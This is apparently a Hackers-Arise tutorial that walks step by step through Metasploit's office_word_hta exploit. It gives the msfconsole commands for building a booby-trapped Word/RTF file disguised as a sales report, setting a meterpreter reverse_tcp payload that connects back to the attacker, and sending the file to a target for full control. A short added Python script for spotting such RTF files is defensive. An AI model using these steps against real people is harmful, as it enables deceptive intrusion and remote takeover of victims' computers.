Metasploit Basics, Part 11: Exploiting Fileformat Vulnerabilities in MS Office


Welcome back, my fledgling hackers!

As operating system developers become more and more security conscious, operating system exploits become rarer. Not so rare that we don’t see them anymore (see EternalBlue and the .NET vulnerability CVE-2017-8759), but rare enough that hackers tend to focus their efforts on applications and their output files for exploitation. These might include such things as .pdf, .doc, .rtf, .jpg, .lnk and .xls files. These types of exploits are referred to as “file format” exploits because they exploit a particular file format.

Metasploit has a large number of these file format exploits. To find them, we can go to the:

/usr/share/metasploit-framework/modules/exploits/windows/fileformat

directory in Metasploit. There, we can find numerous exploits that fit the file format category. One of the best and most recent is known as the Office Word hta exploit.

This exploit, first found in the wild in late 2016, enables us to create a carefully crafted Office document that when opened by the target will embed a rootkit within their system and give us complete control.

Let’s look at this exploit in this tutorial.

Step #1 Fire Up Kali and Open Metasploit

Step #2 Search for Office Word hta exploit

With the Metasploit console now open, let’s look for this exploit.

msf > search type:exploit fileformat

As you can see above, Metasploit returned a large number of exploits, but I highlighted the “Malicious Office Word Malicious Hta Execution”. That’s the one we want to use here.

Step #3 Load the Office Word HTA Exploit

Let’s now load that exploit.

msf > use exploit/windows/fileformat/office_word_hta

Now, with the exploit loaded, let’s take a look at the information on this exploit.

msf > info

As you can see above, this exploit creates a malicious RTF file that will enable us to execute our code on the target system when they open it. That’s exactly what we want to do!

Step #4 Show Options

The next step is to take a look at our options for this exploit.

msf > show options

As you can see, we need to set the FILENAME (it defaults to msf.doc, which is not very stealthy), the URIPATH and the SRVHOST.

msf > set FILENAME hackersarise_sales_report

msf > set URIPATH hackersarise

msf > set SRVHOST 192.168.1.115

Step #5 Set The PAYLOAD

The next step is to set the PAYLOAD we want to embed on the target system when they open the file. Let’s choose our powerful and trusty windows/meterpreter/reverse_tcp.

msf > set PAYLOAD windows/meterpreter/reverse_tcp

When we once again “show options”, we can see that we need to set the payload LHOST.

Let’s set it to our Kali system.

msf > set LHOST 192.168.1.115

Now, all we need to do is enter exploit, and Metasploit generates a file named hackersarise_sales_report and places it in the /root/.msf4/local directory. It then starts a server at 192.168.1.115 on port 8080. Now, all we need to do is send the file to the target and, when they open it, it will connect to our server, download the meterpreter and connect back to our Kali system, giving us unfettered access to their computer.

We should receive a meterpreter prompt like that above.
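From the defender's side, a file like the one generated above can be triaged by content rather than by name: it is RTF whatever its extension, and it has to carry a remote reference to fetch anything. The following is an added example, not part of the original tutorial or of Metasploit; it assumes the reference sits in a linked OLE object's `\objdata` hex run, and the function names, marker list and sample input are constructed for illustration.

```python
import re

# RTF control words that mark an object as a link / force a refresh when the file opens.
LINK_WORDS = (r"\objautlink", r"\objlink", r"\objupdate")
URL_RE = re.compile(rb"https?://[\x21-\x7e]{4,200}")
WIDE_URL_RE = re.compile(rb"h\x00t\x00t\x00p\x00(?:s\x00)?:\x00/\x00/\x00(?:[\x21-\x7e]\x00){4,200}")

def objdata_blobs(rtf: bytes):
    """Yield the decoded bytes of each \\objdata hex run (whitespace in the run is ignored)."""
    for m in re.finditer(rb"\\objdata\b([^{}\\]*)", rtf):
        hexrun = re.sub(rb"[^0-9A-Fa-f]", b"", m.group(1))
        hexrun = hexrun[: len(hexrun) & ~1]          # drop a dangling nibble
        yield bytes.fromhex(hexrun.decode("ascii"))

def remote_links(rtf: bytes):
    """Return http(s) URLs found inside object data, as ASCII or UTF-16LE strings."""
    urls = set()
    for blob in objdata_blobs(rtf):
        urls.update(u.decode("ascii") for u in URL_RE.findall(blob))
        urls.update(u.decode("utf-16-le") for u in WIDE_URL_RE.findall(blob))
    return sorted(urls)

def triage(data: bytes):
    """Classify by content, not by file name or extension."""
    if not data.lstrip().startswith(b"{\\rt"):
        return {"rtf": False, "link_words": [], "urls": [], "suspicious": False}
    words = [w for w in LINK_WORDS
             if re.search(re.escape(w.encode()) + rb"(?![a-z])", data)]
    urls = remote_links(data)
    return {"rtf": True, "link_words": words, "urls": urls,
            "suspicious": bool(words and urls)}

def constructed_sample(url: str, wrap: int = 32) -> bytes:
    """Constructed test input: only the markers triage() looks for, not a working document."""
    hexdata = (b"\x01\x05\x00\x00" + url.encode("utf-16-le") + b"\x00\x00").hex()
    lines = "\r\n".join(hexdata[i:i + wrap] for i in range(0, len(hexdata), wrap))
    return b"{\\rtf1{\\object\\objautlink\\objupdate{\\*\\objdata " + lines.encode() + b"}}}"

if __name__ == "__main__":
    print(triage(constructed_sample("http://192.0.2.10:8080/example")))
    print(triage(b"{\\rtf1 plain text mentioning http://example.com/}"))
```

Real documents may obfuscate the hex run with nested groups or extra control words, which this narrow heuristic does not unwrap, so treat a negative result as inconclusive.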

Keep coming back, my fledgling hackers, to learn how to use Metasploit for hacking in this “Metasploit Basics” series and nearly every other form of hacking on Hackers-Arise!